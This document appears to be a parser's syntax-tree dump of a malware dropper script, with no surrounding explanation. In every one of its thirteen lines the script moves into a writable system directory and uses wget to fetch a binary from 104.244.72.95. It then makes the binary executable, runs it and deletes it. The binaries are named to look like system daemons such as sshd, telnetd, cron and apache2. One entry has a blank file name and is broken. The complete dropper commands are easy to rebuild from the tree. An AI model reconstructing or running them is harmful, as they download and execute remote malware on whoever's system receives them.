ListNode(lineno=2, pos=(12, 141), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://104.244.72.95/nantpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 116), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 116), word='nantpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(116, 117)),
  CommandNode(lineno=2, pos=(118, 126), parts=[
    WordNode(lineno=2, pos=(118, 126), word='./nantpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(126, 127)),
  CommandNode(lineno=2, pos=(128, 141), parts=[
    WordNode(lineno=2, pos=(128, 130), word='rm'),
    WordNode(lineno=2, pos=(131, 134), word='-rf'),
    WordNode(lineno=2, pos=(135, 141), word='nantpd'),
  ]),
])
ListNode(lineno=3, pos=(142, 271), parts=[
  CommandNode(lineno=3, pos=(142, 149), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 149), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(150, 152)),
  CommandNode(lineno=3, pos=(153, 164), parts=[
    WordNode(lineno=3, pos=(153, 155), word='cd'),
    WordNode(lineno=3, pos=(156, 164), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 175), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 175), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(176, 178)),
  CommandNode(lineno=3, pos=(179, 187), parts=[
    WordNode(lineno=3, pos=(179, 181), word='cd'),
    WordNode(lineno=3, pos=(182, 187), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(188, 190)),
  CommandNode(lineno=3, pos=(191, 195), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 195), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(195, 196)),
  CommandNode(lineno=3, pos=(197, 229), parts=[
    WordNode(lineno=3, pos=(197, 201), word='wget'),
    WordNode(lineno=3, pos=(202, 229), word='http://104.244.72.95/nasshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(229, 230)),
  CommandNode(lineno=3, pos=(231, 246), parts=[
    WordNode(lineno=3, pos=(231, 236), word='chmod'),
    WordNode(lineno=3, pos=(237, 239), word='+x'),
    WordNode(lineno=3, pos=(240, 246), word='nasshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 256), parts=[
    WordNode(lineno=3, pos=(248, 256), word='./nasshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(256, 257)),
  CommandNode(lineno=3, pos=(258, 271), parts=[
    WordNode(lineno=3, pos=(258, 260), word='rm'),
    WordNode(lineno=3, pos=(261, 264), word='-rf'),
    WordNode(lineno=3, pos=(265, 271), word='nasshd'),
  ]),
])
ListNode(lineno=4, pos=(272, 413), parts=[
  CommandNode(lineno=4, pos=(272, 279), parts=[
    WordNode(lineno=4, pos=(272, 274), word='cd'),
    WordNode(lineno=4, pos=(275, 279), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(280, 282)),
  CommandNode(lineno=4, pos=(283, 294), parts=[
    WordNode(lineno=4, pos=(283, 285), word='cd'),
    WordNode(lineno=4, pos=(286, 294), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(295, 297)),
  CommandNode(lineno=4, pos=(298, 305), parts=[
    WordNode(lineno=4, pos=(298, 300), word='cd'),
    WordNode(lineno=4, pos=(301, 305), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 317), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 317), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(318, 320)),
  CommandNode(lineno=4, pos=(321, 325), parts=[
    WordNode(lineno=4, pos=(321, 323), word='cd'),
    WordNode(lineno=4, pos=(324, 325), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(325, 326)),
  CommandNode(lineno=4, pos=(327, 362), parts=[
    WordNode(lineno=4, pos=(327, 331), word='wget'),
    WordNode(lineno=4, pos=(332, 362), word='http://104.244.72.95/naopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 382), parts=[
    WordNode(lineno=4, pos=(364, 369), word='chmod'),
    WordNode(lineno=4, pos=(370, 372), word='+x'),
    WordNode(lineno=4, pos=(373, 382), word='naopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(382, 383)),
  CommandNode(lineno=4, pos=(384, 395), parts=[
    WordNode(lineno=4, pos=(384, 395), word='./naopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(395, 396)),
  CommandNode(lineno=4, pos=(397, 413), parts=[
    WordNode(lineno=4, pos=(397, 399), word='rm'),
    WordNode(lineno=4, pos=(400, 403), word='-rf'),
    WordNode(lineno=4, pos=(404, 413), word='naopenssh'),
  ]),
])
ListNode(lineno=5, pos=(414, 543), parts=[
  CommandNode(lineno=5, pos=(414, 421), parts=[
    WordNode(lineno=5, pos=(414, 416), word='cd'),
    WordNode(lineno=5, pos=(417, 421), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(422, 424)),
  CommandNode(lineno=5, pos=(425, 436), parts=[
    WordNode(lineno=5, pos=(425, 427), word='cd'),
    WordNode(lineno=5, pos=(428, 436), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(437, 439)),
  CommandNode(lineno=5, pos=(440, 447), parts=[
    WordNode(lineno=5, pos=(440, 442), word='cd'),
    WordNode(lineno=5, pos=(443, 447), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(448, 450)),
  CommandNode(lineno=5, pos=(451, 459), parts=[
    WordNode(lineno=5, pos=(451, 453), word='cd'),
    WordNode(lineno=5, pos=(454, 459), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(460, 462)),
  CommandNode(lineno=5, pos=(463, 467), parts=[
    WordNode(lineno=5, pos=(463, 465), word='cd'),
    WordNode(lineno=5, pos=(466, 467), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(467, 468)),
  CommandNode(lineno=5, pos=(469, 501), parts=[
    WordNode(lineno=5, pos=(469, 473), word='wget'),
    WordNode(lineno=5, pos=(474, 501), word='http://104.244.72.95/nabash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(501, 502)),
  CommandNode(lineno=5, pos=(503, 518), parts=[
    WordNode(lineno=5, pos=(503, 508), word='chmod'),
    WordNode(lineno=5, pos=(509, 511), word='+x'),
    WordNode(lineno=5, pos=(512, 518), word='nabash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(518, 519)),
  CommandNode(lineno=5, pos=(520, 528), parts=[
    WordNode(lineno=5, pos=(520, 528), word='./nabash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(528, 529)),
  CommandNode(lineno=5, pos=(530, 543), parts=[
    WordNode(lineno=5, pos=(530, 532), word='rm'),
    WordNode(lineno=5, pos=(533, 536), word='-rf'),
    WordNode(lineno=5, pos=(537, 543), word='nabash'),
  ]),
])
ListNode(lineno=6, pos=(544, 673), parts=[
  CommandNode(lineno=6, pos=(544, 551), parts=[
    WordNode(lineno=6, pos=(544, 546), word='cd'),
    WordNode(lineno=6, pos=(547, 551), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(552, 554)),
  CommandNode(lineno=6, pos=(555, 566), parts=[
    WordNode(lineno=6, pos=(555, 557), word='cd'),
    WordNode(lineno=6, pos=(558, 566), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(567, 569)),
  CommandNode(lineno=6, pos=(570, 577), parts=[
    WordNode(lineno=6, pos=(570, 572), word='cd'),
    WordNode(lineno=6, pos=(573, 577), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(578, 580)),
  CommandNode(lineno=6, pos=(581, 589), parts=[
    WordNode(lineno=6, pos=(581, 583), word='cd'),
    WordNode(lineno=6, pos=(584, 589), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(590, 592)),
  CommandNode(lineno=6, pos=(593, 597), parts=[
    WordNode(lineno=6, pos=(593, 595), word='cd'),
    WordNode(lineno=6, pos=(596, 597), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(597, 598)),
  CommandNode(lineno=6, pos=(599, 631), parts=[
    WordNode(lineno=6, pos=(599, 603), word='wget'),
    WordNode(lineno=6, pos=(604, 631), word='http://104.244.72.95/natftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(631, 632)),
  CommandNode(lineno=6, pos=(633, 648), parts=[
    WordNode(lineno=6, pos=(633, 638), word='chmod'),
    WordNode(lineno=6, pos=(639, 641), word='+x'),
    WordNode(lineno=6, pos=(642, 648), word='natftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(648, 649)),
  CommandNode(lineno=6, pos=(650, 658), parts=[
    WordNode(lineno=6, pos=(650, 658), word='./natftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(658, 659)),
  CommandNode(lineno=6, pos=(660, 673), parts=[
    WordNode(lineno=6, pos=(660, 662), word='rm'),
    WordNode(lineno=6, pos=(663, 666), word='-rf'),
    WordNode(lineno=6, pos=(667, 673), word='natftp'),
  ]),
])
ListNode(lineno=7, pos=(674, 803), parts=[
  CommandNode(lineno=7, pos=(674, 681), parts=[
    WordNode(lineno=7, pos=(674, 676), word='cd'),
    WordNode(lineno=7, pos=(677, 681), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(682, 684)),
  CommandNode(lineno=7, pos=(685, 696), parts=[
    WordNode(lineno=7, pos=(685, 687), word='cd'),
    WordNode(lineno=7, pos=(688, 696), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(697, 699)),
  CommandNode(lineno=7, pos=(700, 707), parts=[
    WordNode(lineno=7, pos=(700, 702), word='cd'),
    WordNode(lineno=7, pos=(703, 707), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(708, 710)),
  CommandNode(lineno=7, pos=(711, 719), parts=[
    WordNode(lineno=7, pos=(711, 713), word='cd'),
    WordNode(lineno=7, pos=(714, 719), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(720, 722)),
  CommandNode(lineno=7, pos=(723, 727), parts=[
    WordNode(lineno=7, pos=(723, 725), word='cd'),
    WordNode(lineno=7, pos=(726, 727), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(727, 728)),
  CommandNode(lineno=7, pos=(729, 761), parts=[
    WordNode(lineno=7, pos=(729, 733), word='wget'),
    WordNode(lineno=7, pos=(734, 761), word='http://104.244.72.95/nawget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(761, 762)),
  CommandNode(lineno=7, pos=(763, 778), parts=[
    WordNode(lineno=7, pos=(763, 768), word='chmod'),
    WordNode(lineno=7, pos=(769, 771), word='+x'),
    WordNode(lineno=7, pos=(772, 778), word='nawget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(778, 779)),
  CommandNode(lineno=7, pos=(780, 788), parts=[
    WordNode(lineno=7, pos=(780, 788), word='./nawget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(788, 789)),
  CommandNode(lineno=7, pos=(790, 803), parts=[
    WordNode(lineno=7, pos=(790, 792), word='rm'),
    WordNode(lineno=7, pos=(793, 796), word='-rf'),
    WordNode(lineno=7, pos=(797, 803), word='nawget'),
  ]),
])
ListNode(lineno=8, pos=(804, 933), parts=[
  CommandNode(lineno=8, pos=(804, 811), parts=[
    WordNode(lineno=8, pos=(804, 806), word='cd'),
    WordNode(lineno=8, pos=(807, 811), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(812, 814)),
  CommandNode(lineno=8, pos=(815, 826), parts=[
    WordNode(lineno=8, pos=(815, 817), word='cd'),
    WordNode(lineno=8, pos=(818, 826), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(827, 829)),
  CommandNode(lineno=8, pos=(830, 837), parts=[
    WordNode(lineno=8, pos=(830, 832), word='cd'),
    WordNode(lineno=8, pos=(833, 837), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(838, 840)),
  CommandNode(lineno=8, pos=(841, 849), parts=[
    WordNode(lineno=8, pos=(841, 843), word='cd'),
    WordNode(lineno=8, pos=(844, 849), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(850, 852)),
  CommandNode(lineno=8, pos=(853, 857), parts=[
    WordNode(lineno=8, pos=(853, 855), word='cd'),
    WordNode(lineno=8, pos=(856, 857), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(857, 858)),
  CommandNode(lineno=8, pos=(859, 891), parts=[
    WordNode(lineno=8, pos=(859, 863), word='wget'),
    WordNode(lineno=8, pos=(864, 891), word='http://104.244.72.95/nacron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(891, 892)),
  CommandNode(lineno=8, pos=(893, 908), parts=[
    WordNode(lineno=8, pos=(893, 898), word='chmod'),
    WordNode(lineno=8, pos=(899, 901), word='+x'),
    WordNode(lineno=8, pos=(902, 908), word='nacron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(908, 909)),
  CommandNode(lineno=8, pos=(910, 918), parts=[
    WordNode(lineno=8, pos=(910, 918), word='./nacron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(918, 919)),
  CommandNode(lineno=8, pos=(920, 933), parts=[
    WordNode(lineno=8, pos=(920, 922), word='rm'),
    WordNode(lineno=8, pos=(923, 926), word='-rf'),
    WordNode(lineno=8, pos=(927, 933), word='nacron'),
  ]),
])
ListNode(lineno=9, pos=(934, 1059), parts=[
  CommandNode(lineno=9, pos=(934, 941), parts=[
    WordNode(lineno=9, pos=(934, 936), word='cd'),
    WordNode(lineno=9, pos=(937, 941), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(942, 944)),
  CommandNode(lineno=9, pos=(945, 956), parts=[
    WordNode(lineno=9, pos=(945, 947), word='cd'),
    WordNode(lineno=9, pos=(948, 956), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(957, 959)),
  CommandNode(lineno=9, pos=(960, 967), parts=[
    WordNode(lineno=9, pos=(960, 962), word='cd'),
    WordNode(lineno=9, pos=(963, 967), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(968, 970)),
  CommandNode(lineno=9, pos=(971, 979), parts=[
    WordNode(lineno=9, pos=(971, 973), word='cd'),
    WordNode(lineno=9, pos=(974, 979), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(980, 982)),
  CommandNode(lineno=9, pos=(983, 987), parts=[
    WordNode(lineno=9, pos=(983, 985), word='cd'),
    WordNode(lineno=9, pos=(986, 987), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(987, 988)),
  CommandNode(lineno=9, pos=(989, 1020), parts=[
    WordNode(lineno=9, pos=(989, 993), word='wget'),
    WordNode(lineno=9, pos=(994, 1020), word='http://104.244.72.95/naftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1020, 1021)),
  CommandNode(lineno=9, pos=(1022, 1036), parts=[
    WordNode(lineno=9, pos=(1022, 1027), word='chmod'),
    WordNode(lineno=9, pos=(1028, 1030), word='+x'),
    WordNode(lineno=9, pos=(1031, 1036), word='naftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1036, 1037)),
  CommandNode(lineno=9, pos=(1038, 1045), parts=[
    WordNode(lineno=9, pos=(1038, 1045), word='./naftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1045, 1046)),
  CommandNode(lineno=9, pos=(1047, 1059), parts=[
    WordNode(lineno=9, pos=(1047, 1049), word='rm'),
    WordNode(lineno=9, pos=(1050, 1053), word='-rf'),
    WordNode(lineno=9, pos=(1054, 1059), word='naftp'),
  ]),
])
ListNode(lineno=10, pos=(1060, 1189), parts=[
  CommandNode(lineno=10, pos=(1060, 1067), parts=[
    WordNode(lineno=10, pos=(1060, 1062), word='cd'),
    WordNode(lineno=10, pos=(1063, 1067), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1068, 1070)),
  CommandNode(lineno=10, pos=(1071, 1082), parts=[
    WordNode(lineno=10, pos=(1071, 1073), word='cd'),
    WordNode(lineno=10, pos=(1074, 1082), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1083, 1085)),
  CommandNode(lineno=10, pos=(1086, 1093), parts=[
    WordNode(lineno=10, pos=(1086, 1088), word='cd'),
    WordNode(lineno=10, pos=(1089, 1093), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1094, 1096)),
  CommandNode(lineno=10, pos=(1097, 1105), parts=[
    WordNode(lineno=10, pos=(1097, 1099), word='cd'),
    WordNode(lineno=10, pos=(1100, 1105), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1106, 1108)),
  CommandNode(lineno=10, pos=(1109, 1113), parts=[
    WordNode(lineno=10, pos=(1109, 1111), word='cd'),
    WordNode(lineno=10, pos=(1112, 1113), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1113, 1114)),
  CommandNode(lineno=10, pos=(1115, 1147), parts=[
    WordNode(lineno=10, pos=(1115, 1119), word='wget'),
    WordNode(lineno=10, pos=(1120, 1147), word='http://104.244.72.95/napftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1147, 1148)),
  CommandNode(lineno=10, pos=(1149, 1164), parts=[
    WordNode(lineno=10, pos=(1149, 1154), word='chmod'),
    WordNode(lineno=10, pos=(1155, 1157), word='+x'),
    WordNode(lineno=10, pos=(1158, 1164), word='napftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1164, 1165)),
  CommandNode(lineno=10, pos=(1166, 1174), parts=[
    WordNode(lineno=10, pos=(1166, 1174), word='./napftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1174, 1175)),
  CommandNode(lineno=10, pos=(1176, 1189), parts=[
    WordNode(lineno=10, pos=(1176, 1178), word='rm'),
    WordNode(lineno=10, pos=(1179, 1182), word='-rf'),
    WordNode(lineno=10, pos=(1183, 1189), word='napftp'),
  ]),
])
ListNode(lineno=11, pos=(1190, 1311), parts=[
  CommandNode(lineno=11, pos=(1190, 1197), parts=[
    WordNode(lineno=11, pos=(1190, 1192), word='cd'),
    WordNode(lineno=11, pos=(1193, 1197), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1198, 1200)),
  CommandNode(lineno=11, pos=(1201, 1212), parts=[
    WordNode(lineno=11, pos=(1201, 1203), word='cd'),
    WordNode(lineno=11, pos=(1204, 1212), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1213, 1215)),
  CommandNode(lineno=11, pos=(1216, 1223), parts=[
    WordNode(lineno=11, pos=(1216, 1218), word='cd'),
    WordNode(lineno=11, pos=(1219, 1223), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1224, 1226)),
  CommandNode(lineno=11, pos=(1227, 1235), parts=[
    WordNode(lineno=11, pos=(1227, 1229), word='cd'),
    WordNode(lineno=11, pos=(1230, 1235), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1236, 1238)),
  CommandNode(lineno=11, pos=(1239, 1243), parts=[
    WordNode(lineno=11, pos=(1239, 1241), word='cd'),
    WordNode(lineno=11, pos=(1242, 1243), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1243, 1244)),
  CommandNode(lineno=11, pos=(1245, 1275), parts=[
    WordNode(lineno=11, pos=(1245, 1249), word='wget'),
    WordNode(lineno=11, pos=(1250, 1275), word='http://104.244.72.95/nash'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1275, 1276)),
  CommandNode(lineno=11, pos=(1277, 1290), parts=[
    WordNode(lineno=11, pos=(1277, 1282), word='chmod'),
    WordNode(lineno=11, pos=(1283, 1285), word='+x'),
    WordNode(lineno=11, pos=(1286, 1290), word='nash'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1290, 1291)),
  CommandNode(lineno=11, pos=(1292, 1298), parts=[
    WordNode(lineno=11, pos=(1292, 1298), word='./nash'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1298, 1299)),
  CommandNode(lineno=11, pos=(1300, 1311), parts=[
    WordNode(lineno=11, pos=(1300, 1302), word='rm'),
    WordNode(lineno=11, pos=(1303, 1306), word='-rf'),
    WordNode(lineno=11, pos=(1307, 1311), word='nash'),
  ]),
])
ListNode(lineno=12, pos=(1312, 1429), parts=[
  CommandNode(lineno=12, pos=(1312, 1319), parts=[
    WordNode(lineno=12, pos=(1312, 1314), word='cd'),
    WordNode(lineno=12, pos=(1315, 1319), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1320, 1322)),
  CommandNode(lineno=12, pos=(1323, 1334), parts=[
    WordNode(lineno=12, pos=(1323, 1325), word='cd'),
    WordNode(lineno=12, pos=(1326, 1334), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1335, 1337)),
  CommandNode(lineno=12, pos=(1338, 1345), parts=[
    WordNode(lineno=12, pos=(1338, 1340), word='cd'),
    WordNode(lineno=12, pos=(1341, 1345), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1346, 1348)),
  CommandNode(lineno=12, pos=(1349, 1357), parts=[
    WordNode(lineno=12, pos=(1349, 1351), word='cd'),
    WordNode(lineno=12, pos=(1352, 1357), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1358, 1360)),
  CommandNode(lineno=12, pos=(1361, 1365), parts=[
    WordNode(lineno=12, pos=(1361, 1363), word='cd'),
    WordNode(lineno=12, pos=(1364, 1365), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1365, 1366)),
  CommandNode(lineno=12, pos=(1367, 1396), parts=[
    WordNode(lineno=12, pos=(1367, 1371), word='wget'),
    WordNode(lineno=12, pos=(1372, 1396), word='http://104.244.72.95/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1396, 1397)),
  CommandNode(lineno=12, pos=(1398, 1410), parts=[
    WordNode(lineno=12, pos=(1398, 1403), word='chmod'),
    WordNode(lineno=12, pos=(1404, 1406), word='+x'),
    WordNode(lineno=12, pos=(1407, 1410), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1410, 1411)),
  CommandNode(lineno=12, pos=(1412, 1417), parts=[
    WordNode(lineno=12, pos=(1412, 1417), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1417, 1418)),
  CommandNode(lineno=12, pos=(1419, 1429), parts=[
    WordNode(lineno=12, pos=(1419, 1421), word='rm'),
    WordNode(lineno=12, pos=(1422, 1425), word='-rf'),
    WordNode(lineno=12, pos=(1426, 1429), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1430, 1571), parts=[
  CommandNode(lineno=13, pos=(1430, 1437), parts=[
    WordNode(lineno=13, pos=(1430, 1432), word='cd'),
    WordNode(lineno=13, pos=(1433, 1437), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1438, 1440)),
  CommandNode(lineno=13, pos=(1441, 1452), parts=[
    WordNode(lineno=13, pos=(1441, 1443), word='cd'),
    WordNode(lineno=13, pos=(1444, 1452), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1453, 1455)),
  CommandNode(lineno=13, pos=(1456, 1463), parts=[
    WordNode(lineno=13, pos=(1456, 1458), word='cd'),
    WordNode(lineno=13, pos=(1459, 1463), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1464, 1466)),
  CommandNode(lineno=13, pos=(1467, 1475), parts=[
    WordNode(lineno=13, pos=(1467, 1469), word='cd'),
    WordNode(lineno=13, pos=(1470, 1475), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1476, 1478)),
  CommandNode(lineno=13, pos=(1479, 1483), parts=[
    WordNode(lineno=13, pos=(1479, 1481), word='cd'),
    WordNode(lineno=13, pos=(1482, 1483), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1483, 1484)),
  CommandNode(lineno=13, pos=(1485, 1520), parts=[
    WordNode(lineno=13, pos=(1485, 1489), word='wget'),
    WordNode(lineno=13, pos=(1490, 1520), word='http://104.244.72.95/naapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1520, 1521)),
  CommandNode(lineno=13, pos=(1522, 1540), parts=[
    WordNode(lineno=13, pos=(1522, 1527), word='chmod'),
    WordNode(lineno=13, pos=(1528, 1530), word='+x'),
    WordNode(lineno=13, pos=(1531, 1540), word='naapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1540, 1541)),
  CommandNode(lineno=13, pos=(1542, 1553), parts=[
    WordNode(lineno=13, pos=(1542, 1553), word='./naapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1553, 1554)),
  CommandNode(lineno=13, pos=(1555, 1571), parts=[
    WordNode(lineno=13, pos=(1555, 1557), word='rm'),
    WordNode(lineno=13, pos=(1558, 1561), word='-rf'),
    WordNode(lineno=13, pos=(1562, 1571), word='naapache2'),
  ]),
])
ListNode(lineno=14, pos=(1572, 1713), parts=[
  CommandNode(lineno=14, pos=(1572, 1579), parts=[
    WordNode(lineno=14, pos=(1572, 1574), word='cd'),
    WordNode(lineno=14, pos=(1575, 1579), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1580, 1582)),
  CommandNode(lineno=14, pos=(1583, 1594), parts=[
    WordNode(lineno=14, pos=(1583, 1585), word='cd'),
    WordNode(lineno=14, pos=(1586, 1594), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1595, 1597)),
  CommandNode(lineno=14, pos=(1598, 1605), parts=[
    WordNode(lineno=14, pos=(1598, 1600), word='cd'),
    WordNode(lineno=14, pos=(1601, 1605), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1606, 1608)),
  CommandNode(lineno=14, pos=(1609, 1617), parts=[
    WordNode(lineno=14, pos=(1609, 1611), word='cd'),
    WordNode(lineno=14, pos=(1612, 1617), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1618, 1620)),
  CommandNode(lineno=14, pos=(1621, 1625), parts=[
    WordNode(lineno=14, pos=(1621, 1623), word='cd'),
    WordNode(lineno=14, pos=(1624, 1625), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1625, 1626)),
  CommandNode(lineno=14, pos=(1627, 1662), parts=[
    WordNode(lineno=14, pos=(1627, 1631), word='wget'),
    WordNode(lineno=14, pos=(1632, 1662), word='http://104.244.72.95/natelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1662, 1663)),
  CommandNode(lineno=14, pos=(1664, 1682), parts=[
    WordNode(lineno=14, pos=(1664, 1669), word='chmod'),
    WordNode(lineno=14, pos=(1670, 1672), word='+x'),
    WordNode(lineno=14, pos=(1673, 1682), word='natelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1682, 1683)),
  CommandNode(lineno=14, pos=(1684, 1695), parts=[
    WordNode(lineno=14, pos=(1684, 1695), word='./natelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1695, 1696)),
  CommandNode(lineno=14, pos=(1697, 1713), parts=[
    WordNode(lineno=14, pos=(1697, 1699), word='rm'),
    WordNode(lineno=14, pos=(1700, 1703), word='-rf'),
    WordNode(lineno=14, pos=(1704, 1713), word='natelnetd'),
  ]),
])
